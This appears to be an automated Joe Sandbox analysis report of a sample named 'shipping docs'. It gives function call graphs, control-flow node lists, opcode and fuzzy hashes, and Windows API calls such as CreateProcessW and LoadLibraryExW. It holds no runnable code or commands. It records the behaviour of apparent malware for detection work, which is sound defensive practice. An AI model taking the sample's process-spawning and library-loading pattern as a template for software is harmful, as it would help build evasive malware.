4482c7f CreateProcessW 26198->26199 26201 4482d68 26199->26201 25856 98d01c 25857 98d034 25856->25857 25858 98d08e 25857->25858 25860 4a40be8 25857->25860 25861 4a40c15 25860->25861 25862 4a40c47 25861->25862 25866 4a40d70 25861->25866 25871 4a40d6f 25861->25871 25876 4a40e3c 25861->25876 25868 4a40d84 25866->25868 25867 4a40e10 25867->25862 25882 4a40e27 25868->25882 25885 4a40e28 25868->25885 25873 4a40d84 25871->25873 25872 4a40e10 25872->25862 25874 4a40e27 2 API calls 25873->25874 25875 4a40e28 2 API calls 25873->25875 25874->25872 25875->25872 25877 4a40dfa 25876->25877 25878 4a40e4a 25876->25878 25880 4a40e27 2 API calls 25877->25880 25881 4a40e28 2 API calls 25877->25881 25879 4a40e10 25879->25862 25880->25879 25881->25879 25883 4a40e39 25882->25883 25888 4a422c0 25882->25888 25883->25867 25886 4a40e39 25885->25886 25887 4a422c0 2 API calls 25885->25887 25886->25867 25887->25886 25892 4a422f0 25888->25892 25896 4a422e1 25888->25896 25889 4a422da 25889->25883 25893 4a42332 25892->25893 25895 4a42339 25892->25895 25894 4a4238a CallWindowProcW 25893->25894 25893->25895 25894->25895 25895->25889 25897 4a42332 25896->25897 25899 4a42339 25896->25899 25898 4a4238a CallWindowProcW 25897->25898 25897->25899 25898->25899 25899->25889 25900 b7b530 25901 b7b596 25900->25901 25905 b7b6e0 25901->25905 25908 b7b6f0 25901->25908 25902 b7b645 25906 b7b71e 25905->25906 25911 b79758 25905->25911 25906->25902 25909 b79758 DuplicateHandle 25908->25909 25910 b7b71e 25909->25910 25910->25902 25912 b7b758 DuplicateHandle 25911->25912 25913 b7b7ee 25912->25913 25913->25906 26072 b79050 26073 b7905f 26072->26073 26074 b79137 2 API calls 26072->26074 26075 b79148 2 API calls 26072->26075 26074->26073 26075->26073 25914 4a465b8 25915 4a465e3 25914->25915 25938 4a44af8 25915->25938 25917 4a465ec 25918 4a44af8 4 API calls 25917->25918 25919 4a4660e 25918->25919 25920 4a44af8 4 API calls 25919->25920 25921 4a46630 25920->25921 25922 4a44af8 4 API calls 25921->25922 25923 4a46652 25922->25923 25924 4a44af8 4 API calls 25923->25924 25925 4a46674 25924->25925 25926 4a44af8 4 API calls 25925->25926 25927 4a46696 25926->25927 25943 4a46120 25927->25943 25930 4a46120 4 API calls 25931 4a466da 25930->25931 25932 4a46120 4 API calls 25931->25932 25933 4a466fc 25932->25933 25934 4a46120 4 API calls 25933->25934 25935 4a4671e 25934->25935 25936 4a44af8 4 API calls 25935->25936 25937 4a46850 25936->25937 25939 4a44b03 25938->25939 25940 4a4891b 25939->25940 25947 b76c40 25939->25947 25954 b753bc 25939->25954 25940->25917 25944 4a4612b 25943->25944 26067 4a462f4 25944->26067 25946 4a466b8 25946->25930 25948 b76c49 25947->25948 25950 b76ede 25948->25950 25961 4a490f8 25948->25961 25949 b76f1c 25949->25940 25950->25949 25965 b7b151 25950->25965 25970 b7b160 25950->25970 25955 b753c7 25954->25955 25957 b76ede 25955->25957 25958 4a490f8 3 API calls 25955->25958 25956 b76f1c 25956->25940 25957->25956 25959 b7b151 4 API calls 25957->25959 25960 b7b160 4 API calls 25957->25960 25958->25957 25959->25956 25960->25956 25975 b79137 25961->25975 25983 b79148 25961->25983 25962 4a49106 25962->25950 25967 b7b181 25965->25967 25966 b7b1a5 25966->25949 25967->25966 26003 b7b418 25967->26003 26007 b7b408 25967->26007 25971 b7b181 25970->25971 25972 b7b1a5 25971->25972 25973 b7b418 4 API calls 25971->25973 25974 b7b408 4 API calls 25971->25974 25972->25949 25973->25972 25974->25972 25976 b7915b 25975->25976 25978 b79173 25976->25978 25991 b797d0 25976->25991 25995 b797c0 25976->25995 25977 b7916b 25977->25978 25979 b79370 GetModuleHandleW 25977->25979 25978->25962 25980 b7939d 25979->25980 25980->25962 25984 b7915b 25983->25984 25985 b79173 25984->25985 25989 b797d0 LoadLibraryExW 25984->25989 25990 b797c0 LoadLibraryExW 25984->25990 25985->25962 25986 b7916b 25986->25985 25987 b79370 GetModuleHandleW 25986->25987 25988 b7939d 25987->25988 25988->25962 25989->25986 25990->25986 25992 b797e4 25991->25992 25993 b79809 25992->25993 25999 b793cc 25992->25999 25993->25977 25996 b797e4 25995->25996 25997 b793cc LoadLibraryExW 25996->25997 25998 b79809 25996->25998 25997->25998 25998->25977 26000 b799b0 LoadLibraryExW 25999->26000 26002 b79a29 26000->26002 26002->25993 26004 b7b425 26003->26004 26005 b7b45f 26004->26005 26011 b796d0 26004->26011 26005->25966 26009 b7b425 26007->26009 26008 b7b45f 26008->25966 26009->26008 26010 b796d0 4 API calls 26009->26010 26010->26008 26012 b796db 26011->26012 26014 b7c158 26012->26014 26015 b7bcf4 26012->26015 26014->26014 26016 b7bcff 26015->26016 26017 b753bc 4 API calls 26016->26017 26018 b7c1c7 26016->26018 26017->26018 26022 b7df39 26018->26022 26031 b7df48 26018->26031 26019 b7c200 26019->26014 26024 b7df79 26022->26024 26025 b7e06b 26022->26025 26023 b7df85 26023->26019 26024->26023 26040 b7e290 26024->26040 26043 b7e280 26024->26043 26025->26019 26026 b7dfc6 26026->26025 26047 b7ec58 26026->26047 26052 b7ec48 26026->26052 26033 b7df79 26031->26033 26034 b7e06b 26031->26034 26032 b7df85 26032->26019 26033->26032 26038 b7e290 2 API calls 26033->26038 26039 b7e280 2 API calls 26033->26039 26034->26019 26035 b7dfc6 26035->26034 26036 b7ec58 CreateWindowExW 26035->26036 26037 b7ec48 CreateWindowExW 26035->26037 26036->26034 26037->26034 26038->26035 26039->26035 26041 b79148 2 API calls 26040->26041 26042 b7e299 26041->26042 26042->26026 26044 b7e285 26043->26044 26045 b79148 2 API calls 26044->26045 26046 b7e299 26044->26046 26045->26046 26046->26026 26048 b7ec82 26047->26048 26049 b7ed29 26048->26049 26057 b7f9f8 26048->26057 26060 b7fa08 26048->26060 26053 b7ec82 26052->26053 26054 b7ed29 26053->26054 26055 b7f9f8 CreateWindowExW 26053->26055 26056 b7fa08 CreateWindowExW 26053->26056 26055->26054 26056->26054 26063 b7dccc 26057->26063 26061 b7fa3d 26060->26061 26062 b7dccc CreateWindowExW 26060->26062 26061->26049 26062->26061 26064 b7fa58 CreateWindowExW 26063->26064 26066 b7fb7c 26064->26066 26068 4a462ff 26067->26068 26069 4a49912 26068->26069 26070 b76c40 4 API calls 26068->26070 26071 b753bc 4 API calls 26068->26071 26069->25946 26070->26069 26071->26069 26076 b76518 26079 b7532c 26076->26079 26078 b76526 26080 b75337 26079->26080 26083 b7535c 26080->26083 26082 b765fd 26082->26078 26084 b75367 26083->26084 26087 b7538c 26084->26087 26086 b766da 26086->26082 26088 b75397 26087->26088 26089 b753bc 4 API calls 26088->26089 26090 b767ca 26089->26090 26090->26086

                                                                                              Executed Functions

                                                                                              Function 04A465A9 Relevance: 38.5, Strings: 29, Instructions: 2296COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 4a465a9-4a465d9 2 4a465e3-4a465e7 call 4a44af8 0->2 4 4a465ec-4a465fb 2->4 6 4a46605-4a46609 call 4a44af8 4->6 8 4a4660e-4a4672d call 4a44af8 * 4 call 4a46120 * 4 6->8 42 4a46737-4a4673b call 4a46130 8->42 44 4a46740-4a46771 call 4a46130 42->44 50 4a4677b-4a4677f call 4a46140 44->50 52 4a46784-4a4681b call 4a46150 * 4 50->52 70 4a46825-4a46829 call 4a46160 52->70 72 4a4682e-4a4687f call 4a44af8 70->72 81 4a46888-4a46897 72->81 82 4a4689d-4a468ad 81->82 84 4a468b7-4a468e5 call 4a46170 82->84 88 4a468eb-4a468f9 84->88 89 4a46902-4a46927 call 4a46180 88->89 91 4a4692c-4a4693c 89->91 93 4a46947-4a46954 call 4a46190 91->93 95 4a46959-4a4744f call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46180 93->95 267 4a47458-4a47467 95->267 268 4a47470-4a4751b call 4a46190 call 4a461a8 call 4a461b8 267->268 279 4a47524-4a47533 268->279 280 4a47539-4a47918 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461c8 call 4a461d8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461c8 call 4a461d8 call 4a46170 279->280 345 4a47921-4a47930 call 4a461e8 280->345 347 4a47935-4a47939 345->347 348 4a47942-4a47951 347->348 349 4a4795a-4a47a05 call 4a461f8 call 4a46208 348->349 365 4a47a0e-4a47a42 call 4a46180 349->365 367 4a47a47-4a48173 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461d8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461d8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461d8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461d8 365->367 478 4a4817c-4a4818b call 4a46218 367->478 480 4a48190-4a481a1 478->480 481 4a481aa-4a481de call 4a46180 480->481 483 4a481e3-4a4821a call 4a46190 481->483 488 4a48223-4a48232 call 4a46228 483->488 490 4a48237-4a48273 call 4a46238 488->490 495 4a4827c-4a482b0 call 4a461a8 490->495 497 4a482b5-4a4835d call 4a461b8 call 4a46170 495->497 509 4a48366-4a4839a call 4a46180 497->509 511 4a4839f-4a4850c call 4a46190 call 4a461a8 call 4a461b8 call 4a46248 call 4a46258 call 4a46268 call 4a46278 509->511 534 4a48515-4a48525 511->534 535 4a4852b-4a4856c call 4a46278 * 2 534->535 542 4a48575-4a48585 535->542 543 4a4858b-4a48771 call 4a46278 * 11 542->543 586 4a4877a-4a4878a 543->586 587 4a48790-4a488b9 call 4a46278 * 5 call 4a46190 586->587 613 4a488c2-4a488da call 4a46288 587->613 618 4a488e5-4a488f3 613->618
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.278100258.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4a40000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $ $ $ $'$'$'$*$8$>$B$C$J$K$L$N$P$T$U$V$X$[$c$n$p$p$w$x$y
                                                                                              • API String ID: 0-2341653528
                                                                                              • Opcode ID: 3d9219ea3c4c4e905815cc9833dca2d2cb0658225e3e82ad1f9e763ea20dee51
                                                                                              • Instruction ID: a9121f413dd4bfe7027fff9f87dccfa878292fa7e335e62af81aaff867713edf
                                                                                              • Opcode Fuzzy Hash: 3d9219ea3c4c4e905815cc9833dca2d2cb0658225e3e82ad1f9e763ea20dee51
                                                                                              • Instruction Fuzzy Hash: A3331434A11615CFCB54EF28C958BACB7F2AF8A705F1141E9E10AAB361DB75AD81CF40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04A465B8 Relevance: 38.5, Strings: 29, Instructions: 2292COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 620 4a465b8-4a488da call 4a44af8 * 6 call 4a46120 * 4 call 4a46130 * 2 call 4a46140 call 4a46150 * 4 call 4a46160 call 4a44af8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461c8 call 4a461d8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461c8 call 4a461d8 call 4a46170 call 4a461e8 call 4a461f8 call 4a46208 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461d8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461d8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461d8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a461d8 call 4a46218 call 4a46180 call 4a46190 call 4a46228 call 4a46238 call 4a461a8 call 4a461b8 call 4a46170 call 4a46180 call 4a46190 call 4a461a8 call 4a461b8 call 4a46248 call 4a46258 call 4a46268 call 4a46278 * 19 call 4a46190 call 4a46288 1237 4a488e5-4a488f3 620->1237
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.278100258.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4a40000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $ $ $ $'$'$'$*$8$>$B$C$J$K$L$N$P$T$U$V$X$[$c$n$p$p$w$x$y
                                                                                              • API String ID: 0-2341653528
                                                                                              • Opcode ID: da79044549a35eb34336e32b2f4f243969d21c1061f403900282b73202c048f4
                                                                                              • Instruction ID: 8f975cc594ce1d76c179277cd4ccbbd4a90300f3a93f51b397f8ac1c67bfd5f1
                                                                                              • Opcode Fuzzy Hash: da79044549a35eb34336e32b2f4f243969d21c1061f403900282b73202c048f4
                                                                                              • Instruction Fuzzy Hash: 7D330434A51615CFCB54EF28C958BACB7F2AF8A705F1141E9E10AAB361DB71AD81CF40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 044813D0 Relevance: 3.9, Strings: 3, Instructions: 168COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1239 44813d0-44813f5 1240 44813fc-4481423 1239->1240 1241 44813f7 1239->1241 1242 4481424 1240->1242 1241->1240 1243 448142b-4481447 1242->1243 1244 4481449 1243->1244 1245 4481450-4481451 1243->1245 1244->1242 1246 44814ca-44814d3 1244->1246 1247 4481461-4481476 1244->1247 1248 44815c7-44815da 1244->1248 1249 44814d8-44814e9 1244->1249 1250 4481478-4481480 1244->1250 1251 4481598 1244->1251 1252 4481539-4481552 1244->1252 1253 448157a-448158d 1244->1253 1254 44815dc-44815f4 1244->1254 1255 448155d-4481575 1244->1255 1256 4481592-4481593 1244->1256 1257 4481515-4481534 1244->1257 1258 4481456-448145f 1244->1258 1259 44815f6-44815fb 1244->1259 1260 4481557-4481558 1244->1260 1245->1256 1245->1258 1246->1243 1247->1243 1261 448159f-44815bb 1248->1261 1264 44814eb-44814fa 1249->1264 1265 44814fc-4481503 1249->1265 1274 4481483 call 44819ec 1250->1274 1275 4481483 call 448257c 1250->1275 1276 4481483 call 4481fec 1250->1276 1277 4481483 call 44823cd 1250->1277 1278 4481483 call 448250d 1250->1278 1279 4481483 call 4481c7d 1250->1279 1280 4481483 call 4481dae 1250->1280 1281 4481483 call 4481ab0 1250->1281 1282 4481483 call 4481ef2 1250->1282 1283 4481483 call 4481a37 1250->1283 1251->1261 1252->1243 1253->1243 1254->1261 1255->1243 1256->1251 1263 44815fd-4481604 1256->1263 1257->1243 1258->1243 1259->1263 1262 4481606-448160f 1260->1262 1266 44815bd 1261->1266 1267 44815c4-44815c5 1261->1267 1263->1262 1268 448150a-4481510 1264->1268 1265->1268 1266->1248 1266->1251 1266->1254 1266->1259 1267->1248 1267->1259 1268->1243 1270 4481489-4481497 1271 4481499-44814a8 1270->1271 1272 44814aa-44814b1 1270->1272 1273 44814b8-44814c5 1271->1273 1272->1273 1273->1243 1274->1270 1275->1270 1276->1270 1277->1270 1278->1270 1279->1270 1280->1270 1281->1270 1282->1270 1283->1270
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C!s[$_e/$_e/
                                                                                              • API String ID: 0-1613511610
                                                                                              • Opcode ID: 214d9c26c45f60d17972b9309694981d2fed6cb0efac40e4d6f7820d1e582fa0
                                                                                              • Instruction ID: bfa449c85c549e2c1ceb2702022841589d82cd577770cb398566a6e9995e125c
                                                                                              • Opcode Fuzzy Hash: 214d9c26c45f60d17972b9309694981d2fed6cb0efac40e4d6f7820d1e582fa0
                                                                                              • Instruction Fuzzy Hash: 1B615CB0E06218DBDF14DF95E5816EEFBB6BF89310F24A42BD406B7244E734A9468B14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 044813C1 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1284 44813c1-44813f5 1285 44813fc-4481423 1284->1285 1286 44813f7 1284->1286 1287 4481424 1285->1287 1286->1285 1288 448142b-4481447 1287->1288 1289 4481449 1288->1289 1290 4481450-4481451 1288->1290 1289->1287 1291 44814ca-44814d3 1289->1291 1292 4481461-4481476 1289->1292 1293 44815c7-44815da 1289->1293 1294 44814d8-44814e9 1289->1294 1295 4481478-4481480 1289->1295 1296 4481598 1289->1296 1297 4481539-4481552 1289->1297 1298 448157a-448158d 1289->1298 1299 44815dc-44815f4 1289->1299 1300 448155d-4481575 1289->1300 1301 4481592-4481593 1289->1301 1302 4481515-4481534 1289->1302 1303 4481456-448145f 1289->1303 1304 44815f6-44815fb 1289->1304 1305 4481557-4481558 1289->1305 1290->1301 1290->1303 1291->1288 1292->1288 1306 448159f-44815bb 1293->1306 1309 44814eb-44814fa 1294->1309 1310 44814fc-4481503 1294->1310 1319 4481483 call 44819ec 1295->1319 1320 4481483 call 448257c 1295->1320 1321 4481483 call 4481fec 1295->1321 1322 4481483 call 44823cd 1295->1322 1323 4481483 call 448250d 1295->1323 1324 4481483 call 4481c7d 1295->1324 1325 4481483 call 4481dae 1295->1325 1326 4481483 call 4481ab0 1295->1326 1327 4481483 call 4481ef2 1295->1327 1328 4481483 call 4481a37 1295->1328 1296->1306 1297->1288 1298->1288 1299->1306 1300->1288 1301->1296 1308 44815fd-4481604 1301->1308 1302->1288 1303->1288 1304->1308 1307 4481606-448160f 1305->1307 1311 44815bd 1306->1311 1312 44815c4-44815c5 1306->1312 1308->1307 1313 448150a-4481510 1309->1313 1310->1313 1311->1293 1311->1296 1311->1299 1311->1304 1312->1293 1312->1304 1313->1288 1315 4481489-4481497 1316 4481499-44814a8 1315->1316 1317 44814aa-44814b1 1315->1317 1318 44814b8-44814c5 1316->1318 1317->1318 1318->1288 1319->1315 1320->1315 1321->1315 1322->1315 1323->1315 1324->1315 1325->1315 1326->1315 1327->1315 1328->1315
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C!s[$_e/$_e/
                                                                                              • API String ID: 0-1613511610
                                                                                              • Opcode ID: 1b8bc0ca78156adc92a7bde1aade485d0d92a2346896571c0ec119941a86a357
                                                                                              • Instruction ID: d637332a48b533dcacb6707017050f3f459ff0bba044a1832a5836bc34ff1d07
                                                                                              • Opcode Fuzzy Hash: 1b8bc0ca78156adc92a7bde1aade485d0d92a2346896571c0ec119941a86a357
                                                                                              • Instruction Fuzzy Hash: 3D518C70E06218DBDF04DFA5E5846EEFBB2EF89310F24A42FD406B7254E734A9468B14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04483635 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 7iz
                                                                                              • API String ID: 0-2637832990
                                                                                              • Opcode ID: 639b3e1437acaaea98d04c2b859357b9299437b8a271f6bb6b15c2dcfa0dbe0d
                                                                                              • Instruction ID: 53204f2fb1f69e512e5c589f720489aeca20f3f2733ec613a33151cbf9686bdf
                                                                                              • Opcode Fuzzy Hash: 639b3e1437acaaea98d04c2b859357b9299437b8a271f6bb6b15c2dcfa0dbe0d
                                                                                              • Instruction Fuzzy Hash: 3B71F5B4E09208CFCF14EFA5D5845ADBBB2FB59710F24A52ED80AB7254E735A942CF04
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04480006 Relevance: .2, Instructions: 203COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 74cb58c95a23f9078cdf0bc81162976ee1c8b905f174113ddeed8252209ce83d
                                                                                              • Instruction ID: 8856d6b5d3e11d9e0c0b857cda0b99e5e5c684918a785a4b7b77edc532ef7ee0
                                                                                              • Opcode Fuzzy Hash: 74cb58c95a23f9078cdf0bc81162976ee1c8b905f174113ddeed8252209ce83d
                                                                                              • Instruction Fuzzy Hash: 4C913574E0524CDFCB08DFA5E8545AEBBB2FF89304F25806AD816AB365DB346902CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04480040 Relevance: .2, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2c803f4fad423bbc9db44b9a3eae5700900b4f0bd3dd7c01c2d150627291ad90
                                                                                              • Instruction ID: a76b5db9f643fcdecc96b02e2e0800f81fe32bf1ed202278fcdedee8ec19ce1a
                                                                                              • Opcode Fuzzy Hash: 2c803f4fad423bbc9db44b9a3eae5700900b4f0bd3dd7c01c2d150627291ad90
                                                                                              • Instruction Fuzzy Hash: 5971D674E1121CDFDB08DFA5E9545AEBBB2FF89305F21802AD816AB364DB346902CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B79148 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2084 b79148-b79150 2085 b7915b-b7915d 2084->2085 2086 b79156 call b76c34 2084->2086 2087 b79173-b79177 2085->2087 2088 b7915f 2085->2088 2086->2085 2089 b7918b-b791cc 2087->2089 2090 b79179-b79183 2087->2090 2139 b79165 call b797d0 2088->2139 2140 b79165 call b797c0 2088->2140 2095 b791ce-b791d6 2089->2095 2096 b791d9-b791e7 2089->2096 2090->2089 2091 b7916b-b7916d 2091->2087 2093 b792a8-b79368 2091->2093 2132 b79370-b7939b GetModuleHandleW 2093->2132 2133 b7936a-b7936d 2093->2133 2095->2096 2097 b7920b-b7920d 2096->2097 2098 b791e9-b791ee 2096->2098 2102 b79210-b79217 2097->2102 2100 b791f0-b791f7 call b784ec 2098->2100 2101 b791f9 2098->2101 2105 b791fb-b79209 2100->2105 2101->2105 2106 b79224-b7922b 2102->2106 2107 b79219-b79221 2102->2107 2105->2102 2109 b7922d-b79235 2106->2109 2110 b79238-b79241 call b784fc 2106->2110 2107->2106 2109->2110 2115 b79243-b7924b 2110->2115 2116 b7924e-b79253 2110->2116 2115->2116 2117 b79255-b7925c 2116->2117 2118 b79271-b79275 2116->2118 2117->2118 2119 b7925e-b7926e call b7850c call b7851c 2117->2119 2137 b79278 call b79aa1 2118->2137 2138 b79278 call b79ac8 2118->2138 2119->2118 2122 b7927b-b7927e 2125 b792a1-b792a7 2122->2125 2126 b79280-b7929e 2122->2126 2126->2125 2134 b793a4-b793b8 2132->2134 2135 b7939d-b793a3 2132->2135 2133->2132 2135->2134 2137->2122 2138->2122 2139->2091 2140->2091
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00B7938E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 59c4aa35d7bdcbcb6e9ab210cc7c0ce491a1e90ee7bcf220af6e2c702f8ec5cb
                                                                                              • Instruction ID: ba9f3ff32a68f4286bc9ce100d07d532a06800cab62b3414d1b7556700b17695
                                                                                              • Opcode Fuzzy Hash: 59c4aa35d7bdcbcb6e9ab210cc7c0ce491a1e90ee7bcf220af6e2c702f8ec5cb
                                                                                              • Instruction Fuzzy Hash: 57712270A00B059FD724DF2AD44575ABBF1FF88314F008A6DD49ADBA41DB74E9058F91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04482BF5 Relevance: 1.6, APIs: 1, Instructions: 148processCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2141 4482bf5-4482c8b 2143 4482c8d-4482c93 2141->2143 2144 4482c96-4482c9d 2141->2144 2143->2144 2145 4482ca8-4482cbe 2144->2145 2146 4482c9f-4482ca5 2144->2146 2147 4482cc9-4482d66 CreateProcessW 2145->2147 2148 4482cc0-4482cc6 2145->2148 2146->2145 2150 4482d68-4482d6e 2147->2150 2151 4482d6f-4482de3 2147->2151 2148->2147 2150->2151 2159 4482df5-4482dfc 2151->2159 2160 4482de5-4482deb 2151->2160 2161 4482dfe-4482e0d 2159->2161 2162 4482e13 2159->2162 2160->2159 2161->2162 2163 4482e14 2162->2163 2163->2163
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04482D53
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: ccfa535ee5666bc47de91b9d69e15a060912e485940f1e29d1ccde6d1cf6f43d
                                                                                              • Instruction ID: b008289b142606501d4d56787c0b6f7a25ace9af4520f535cdc9c36a5977f616
                                                                                              • Opcode Fuzzy Hash: ccfa535ee5666bc47de91b9d69e15a060912e485940f1e29d1ccde6d1cf6f43d
                                                                                              • Instruction Fuzzy Hash: 9E510771900329DFDF24DF95C880BDEBBB5BF48314F1584AAE908A7250DB71AA85CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04482C00 Relevance: 1.6, APIs: 1, Instructions: 143processCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
